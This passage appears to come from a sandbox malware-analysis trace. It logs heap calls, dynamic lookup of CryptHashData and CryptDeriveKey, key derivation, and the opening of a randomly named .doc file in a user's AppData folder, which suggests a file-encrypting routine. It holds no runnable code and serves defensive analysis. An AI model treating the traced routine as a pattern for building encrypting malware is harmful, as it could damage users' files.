0x2e514d8 [0231.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0231.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0231.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0231.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0231.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0231.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0231.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0231.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0231.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0231.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0231.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51400 [0231.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51400, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0231.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0231.069] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0231.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0231.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0231.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0231.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0231.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0231.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0231.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0231.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0231.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0231.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0231.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0231.070] CryptHashData (hHash=0xa87050, pbData=0x2e54fe8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0231.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0231.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0231.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0231.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0231.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0231.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0231.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0231.070] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0231.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0231.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0231.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0231.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0231.070] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.070] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0231.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0231.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0231.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0231.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04268 [0231.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0231.071] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0231.071] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0231.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0231.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0231.071] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0231.071] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0231.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0231.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0231.071] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0231.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0231.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0231.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0231.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0231.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0231.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51580 [0231.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51580, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0231.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0231.072] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0231.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0231.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0231.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0231.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0231.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0231.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0231.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0231.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0231.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0231.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0231.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0231.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0231.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0231.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0231.073] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87050, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87310) returned 1 [0231.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0231.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0231.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0231.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0231.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0231.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0231.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0231.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0231.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0231.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0231.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0231.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0231.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0231.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0231.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0231.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0231.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0231.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0231.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0231.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0231.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0231.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0231.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0231.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0231.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0231.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0231.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0231.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0231.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0231.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0231.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0231.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0231.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0231.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0231.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0231.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0231.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0231.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0231.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0231.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0231.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0231.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0231.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0231.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0231.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0231.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0231.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0231.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0231.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0231.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0231.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0231.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0231.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0231.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0231.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0231.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0231.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0231.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0231.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0231.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0231.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0231.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0231.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0231.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0231.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0231.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0231.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0231.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0231.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0231.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0231.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0231.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0231.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0231.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0231.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0231.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0231.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0231.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0231.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0231.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0231.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0231.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0231.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0231.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0231.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0231.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0231.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0231.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0231.077] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0231.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0231.077] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0231.077] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.077] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.077] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.077] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.077] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0231.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0231.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0231.077] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0231.078] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0231.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0231.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69928, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0231.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0231.078] CryptDestroyHash (hHash=0xa87050) returned 1 [0231.078] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.182] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.182] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0231.182] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0231.182] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.182] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/FpHVdISbKXY46o.doc" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\fphvdisbkxy46o.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0231.183] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.183] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0231.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0231.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0231.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0231.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0231.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0231.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0231.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0231.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0231.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0231.184] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0231.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0231.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0231.184] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0231.184] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0231.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0231.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0231.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0231.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0231.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0231.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0231.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0231.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 